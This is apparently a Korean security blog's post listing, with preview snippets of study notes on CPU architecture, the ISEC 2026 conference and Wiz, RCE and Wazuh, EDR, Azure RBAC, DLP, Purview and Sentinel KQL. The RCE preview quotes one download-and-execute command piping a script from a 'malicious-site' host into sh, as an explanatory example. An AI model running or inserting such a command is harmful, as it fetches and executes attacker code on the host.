반응형

전체 글 136

01. 시스템 보안 — CPU·기억장치 핵심 정리

핵심 개념 CPU란? CPU는 입력된 명령어와 데이터를 연산하고, 시스템 전체의 동작을 제어하는 핵심 장치이다. 구성 요소ALU: 산술·논리 연산 수행레지스터: CPU 내부의 초고속 임시 기억장치제어장치: 명령어 해석 및 장치 제어내부 버스: CPU 내부 구성요소 간 정보 전달주요 레지스터PC: 다음에 실행할 명령어 주소MAR: 접근할 메모리 주소MBR/MDR: 메모리에서 읽거나 쓸 데이터IR: 현재 실행 중인 명령어ACC: 연산 중간 결과 저장버스버스는 CPU, 메모리, 입출력 장치 간에 데이터·주소·제어 정보를 전달하는 공통 전송 경로이다.데이터 버스: 실제 데이터 전달주소 버스: 접근할 메모리 주소 전달제어 버스: 읽기/쓰기, 인터럽트 등 제어 신호 전달데이터 버스 = 데이터주소 버스 = 위치제어 ..

Isec 1일차~2일차

2026년 8월 11일 ~ 12일 이틀간 열린 ISEC 2026! 개인적으로 준비해야하는건 없었지만, 회사 대표로 그리고 WIZ 솔루션 컨설팅을 위해 참석했습니다. 물론 많은 보안 레퍼런스를 얻을 목적도 있었습니다. 모르는 분들을 위해 한 줄 소개를 하자면 Wiz는 클라우드 보안 솔루션으로 Cnapp 솔루션입니다. Cnapp에 대한 설명은 제 블로그에 있으니까 궁금하신 분들은 참고해주세요!https://doyeon-charm.tistory.com/132 [Wiz] CNAPP/CSPM/CWPPCNAPP (Cloud Native Application Protection Platform) 이란? 클라우드 환경 전체(코드 → 이미지 → 컨테이너 → 클라우드 리소스 → 런타임)를 엔드투엔드로 보호하는 통합 보안..

보안 2026.08.22

IT 용어 공부 - RCE/Wazuh

어제 isec 진행하면서 고객분들이랑 소통하는데, 외계어 하시는 줄 알았다 ㅜㅜ 보안 용어 공부 많ㅇ ㅣ해야지... 어제 못알아들은 단어 2개 RCE (Remote Code Execution): 원격 코드 실행공격자가 대상 서버/PC에 직접 로그인하지 않고도 원격에서 원하는 코드를 실행할 수 있는 취약점 또는 공격 방식RCE 취약점이 존재하면 공격자는 애플리케이션이나 서버가 가진 권한 범위 내에서 명령어를 실행할 수 있다. ex. 웹 애플리케이션이 사용자 입력값을 제대로 검증하지 않고 OS 명령어에 전달하는 경우curl http://malicious-site/payload.sh | sh와 같은 명령을 실행시켜 악성 스크립트를 다운로드하고 실행할 수 있다. RCE가 위험한 이유RCE가 성공하면 단순히 정..

보안 2026.08.13

[보안] EDR vs Wiz Runtime Sensor

EDR(Endpoint Detection & Response)란? 컴퓨터·서버에서 일어나는 공격을 감지하고 대응하는 보안 프로그램호스트(서버/PC) 자체를 보호(OS 레벨에서 일어나는 침해) 주요 기능 엔드포인트(PC·서버) 보호악성코드 탐지랜섬웨어 차단비정상 프로세스 감지침해 흔적(IOC) 찾기포렌식(무슨 일이 일어났는지 기록 확인)→ PC·서버에 설치해서, 이상한 프로그램·행위가 일어나면 잡아주는 보안 솔루션.즉, OS 내부를 감시하는 보안 도구. "서버 한 대" 중심 백신(Vaccine) = Antivirus(AV)악성코드를 찾아서 막아주는 ‘기본형’ 엔드포인트 보안 솔루션바이러스 / 트로이목마 / 웜 / 랜섬웨어 / 서명 기반(알려진 패턴과 비교)실시간 감시→ 악성코드를 잡는 기본 보안 프로그램...

보안 2026.03.12

Azure 권한 체계 (RBAC · Entra ID 역할 · PIM · Wiz 연계)

1. Azure RBAC (Role-Based Access Control) Azure 리소스(VM, VNet, Storage, SQL, Key Vault 등)에 대한 접근 권한을 IAM(Role Assignment) 으로 관리하는 구조입니다. Key Vault의 경우 기존 Access Policy 방식 대신 Azure RBAC 방식으로 통합 관리가 가능합니다. Azure 공통 IAM 역할로 관리하는 방식권한 부여 위치(Scope 계층):Management GroupSubscriptionResource GroupResource 구성 경로: Subscription → Access Control (IAM) IAM → Role Assignment로 권한을 주는 구조핵심 특징:리소스 단위 권한 제어 역할 + 범..

Azure 2026.03.04

[SC-200] DLP - Data Loss Prevention

✅DLP란?DLP = Data Loss Prevention데이터 유출 방지. 데이터 보호 중심 기술 조직의 민감한 정보가 외부로 나가지 못하도록 탐지하고, 통제하고, 차단하는 기술 DLP가 보호하는 데이터 유형주민등록번호여권번호카드번호의료정보내부 기밀 문서민감도 레이블 붙은 문서DLP가 필요한 상황 주민등록번호 파일을 외부 메일로 보내는 것기밀 문서를 개인 Dropbox에 업로드하는 것카드번호 포함 엑셀을 외부 공유하는 것퇴사자가 파일을 대량 다운로드하는 것 → “의도적 또는 실수로 인한 데이터 반출”을 통제하는 것이 DLP DLP의 동작 방식1️⃣ 파일 또는 메일 내용 검사2️⃣ 민감 정보 패턴 탐지3️⃣ 정책 조건 만족 시가능한 조치:차단경고암호화관리자 알림 → 내용 감사 기반 제어 Defen..

Azure 2026.03.02

[SC-200]Microsoft Purview

✅Microsoft Purview란? Microsoft 365 환경의 데이터 보호 및 규정 준수(Compliance) 통합 플랫폼입니다.Sentinel이나 Defender처럼 공격을 탐지하는 도구가 아니라,데이터 보호규정 준수 관리내부자 리스크 분석을 담당하는 플랫폼입니다.1️⃣ 데이터 보안 (Data Security)Data Loss Prevention (DLP)Insider Risk ManagementInformation ProtectionInformation BarriersPrivileged Access Management👉 목적: 데이터 유출 방지 및 내부자 행위 통제 2️⃣ 데이터 거버넌스 (Data Governance)Data MapData Catalog👉 목적: 데이터 자산 관리 및 가시..

Azure 2026.03.02

[SC-200]Microsoft Sentinel KQL

✅KQL(Kusto Query Language) 개요 및 구성KQL은 microsoft sentinel 등에서 대규모 로그 데이터를 효율적으로 검색, 분석, 시각화하는 데 사용되는 언어입니다. Search, Where, Let, Extend, Order, Project, Summarize, Render, Union, Join, Extract, Parse 등의 다양한 연산자를 활용하여 복잡한 쿼리를 구성합니다. Search: 모든 열과 테이블에서 키워드 검색Where: 특정 조건에 따라 결과 필터링Let: 변수 또는 표현식 정의 및 재사용Extend: 새 열을 추가하여 값 계산Summarize: 데이터를 그룹화하고 집계(예: 개수, 평균)Render: 쿼리 결과를 차트나 그래프로 시각화Union: 여러 쿼..

Azure 2026.03.02
728x90
반응형